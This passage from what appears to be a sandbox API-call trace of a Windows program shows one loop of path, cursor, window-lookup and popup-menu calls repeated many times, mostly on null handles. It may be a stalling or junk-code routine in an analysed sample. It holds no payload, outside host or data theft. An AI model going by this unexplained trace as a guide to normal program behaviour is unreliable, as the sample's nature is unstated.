0x1b00018 [0176.334] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.334] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.334] PathFileExistsW (pszPath=0x0) returned 0 [0176.334] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.334] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.334] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.334] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.334] GetMenu (hWnd=0x0) returned 0x0 [0176.334] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x355) returned -1 [0176.334] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.334] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.334] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.334] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.334] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.334] GetStockObject (i=6) returned 0x1b00018 [0176.334] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.334] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.334] PathFileExistsW (pszPath=0x0) returned 0 [0176.334] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.334] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.334] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.334] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.334] GetMenu (hWnd=0x0) returned 0x0 [0176.334] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.334] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.334] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.334] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.334] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.335] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.335] GetStockObject (i=6) returned 0x1b00018 [0176.335] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.335] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.335] PathFileExistsW (pszPath=0x0) returned 0 [0176.335] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.335] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.335] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.335] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.335] GetMenu (hWnd=0x0) returned 0x0 [0176.335] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x350) returned -1 [0176.335] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.335] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.335] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.335] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.335] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.335] GetStockObject (i=6) returned 0x1b00018 [0176.335] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.335] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.335] PathFileExistsW (pszPath=0x0) returned 0 [0176.335] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.335] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.335] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.335] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.335] GetMenu (hWnd=0x0) returned 0x0 [0176.335] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x144) returned -1 [0176.335] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.336] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.336] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.336] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.336] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.336] GetStockObject (i=6) returned 0x1b00018 [0176.336] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.336] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.336] PathFileExistsW (pszPath=0x0) returned 0 [0176.336] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.336] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.336] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.336] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.336] GetMenu (hWnd=0x0) returned 0x0 [0176.336] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.336] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.336] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.336] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.336] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.336] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.336] GetStockObject (i=6) returned 0x1b00018 [0176.336] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.336] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.336] PathFileExistsW (pszPath=0x0) returned 0 [0176.336] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.336] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.336] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.336] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.336] GetMenu (hWnd=0x0) returned 0x0 [0176.336] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x354) returned -1 [0176.336] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.336] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.336] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.336] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.336] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.337] GetStockObject (i=6) returned 0x1b00018 [0176.337] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.337] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.337] PathFileExistsW (pszPath=0x0) returned 0 [0176.337] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.337] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.337] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.337] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.337] GetMenu (hWnd=0x0) returned 0x0 [0176.337] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.337] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.337] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.337] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.337] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.337] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.337] GetStockObject (i=6) returned 0x1b00018 [0176.337] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.337] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.337] PathFileExistsW (pszPath=0x0) returned 0 [0176.337] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.337] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.337] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.337] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.337] GetMenu (hWnd=0x0) returned 0x0 [0176.337] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x34f) returned -1 [0176.337] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.337] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.337] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.337] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.337] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.337] GetStockObject (i=6) returned 0x1b00018 [0176.337] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.337] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.337] PathFileExistsW (pszPath=0x0) returned 0 [0176.338] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.338] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.338] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.338] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.338] GetMenu (hWnd=0x0) returned 0x0 [0176.338] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0xa2) returned -1 [0176.338] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.338] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.338] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.338] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.338] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.338] GetStockObject (i=6) returned 0x1b00018 [0176.338] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.338] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.338] PathFileExistsW (pszPath=0x0) returned 0 [0176.338] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.338] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.338] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.338] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.338] GetMenu (hWnd=0x0) returned 0x0 [0176.338] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.338] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.338] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.338] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.338] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.338] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.338] GetStockObject (i=6) returned 0x1b00018 [0176.338] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.338] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.338] PathFileExistsW (pszPath=0x0) returned 0 [0176.338] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.338] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.338] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.338] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.338] GetMenu (hWnd=0x0) returned 0x0 [0176.339] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x350) returned -1 [0176.339] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.339] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.339] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.339] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.339] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.339] GetStockObject (i=6) returned 0x1b00018 [0176.339] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.339] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.339] PathFileExistsW (pszPath=0x0) returned 0 [0176.339] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.339] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.339] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.339] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.339] GetMenu (hWnd=0x0) returned 0x0 [0176.339] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.339] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.339] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.339] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.339] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.339] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.339] GetStockObject (i=6) returned 0x1b00018 [0176.339] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.339] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.339] PathFileExistsW (pszPath=0x0) returned 0 [0176.339] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.339] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.339] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.339] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.339] GetMenu (hWnd=0x0) returned 0x0 [0176.339] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.339] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.339] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.339] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.339] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.340] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.340] GetStockObject (i=6) returned 0x1b00018 [0176.340] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.340] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.340] PathFileExistsW (pszPath=0x0) returned 0 [0176.340] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.340] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.340] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.340] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.340] GetMenu (hWnd=0x0) returned 0x0 [0176.340] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x409) returned -1 [0176.340] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.340] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.340] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.340] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.340] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.340] GetStockObject (i=6) returned 0x1b00018 [0176.340] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.340] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.340] PathFileExistsW (pszPath=0x0) returned 0 [0176.340] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.340] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.340] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.340] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.340] GetMenu (hWnd=0x0) returned 0x0 [0176.340] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.340] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.340] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.340] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.340] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.340] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.340] GetStockObject (i=6) returned 0x1b00018 [0176.340] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.340] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.340] PathFileExistsW (pszPath=0x0) returned 0 [0176.341] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.341] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.341] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.341] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.341] GetMenu (hWnd=0x0) returned 0x0 [0176.341] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x351) returned -1 [0176.341] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.341] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.341] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.341] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.341] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.341] GetStockObject (i=6) returned 0x1b00018 [0176.341] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.341] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.341] PathFileExistsW (pszPath=0x0) returned 0 [0176.341] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.341] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.341] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.341] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.341] GetMenu (hWnd=0x0) returned 0x0 [0176.341] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.341] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.341] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.341] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.341] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.341] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.341] GetStockObject (i=6) returned 0x1b00018 [0176.341] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.341] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.341] PathFileExistsW (pszPath=0x0) returned 0 [0176.341] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.341] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.341] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.341] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.341] GetMenu (hWnd=0x0) returned 0x0 [0176.342] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x353) returned -1 [0176.342] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.342] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.342] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.342] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.342] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.342] GetStockObject (i=6) returned 0x1b00018 [0176.342] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.342] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.342] PathFileExistsW (pszPath=0x0) returned 0 [0176.342] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.342] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.342] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.342] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.342] GetMenu (hWnd=0x0) returned 0x0 [0176.342] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0xda) returned -1 [0176.342] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.342] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.342] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.342] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.342] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.342] GetStockObject (i=6) returned 0x1b00018 [0176.342] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.342] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.342] PathFileExistsW (pszPath=0x0) returned 0 [0176.342] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.342] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.342] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.342] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.342] GetMenu (hWnd=0x0) returned 0x0 [0176.342] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.342] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.342] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.342] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.342] GetMenuItemRect (in: hWnd=0x0, 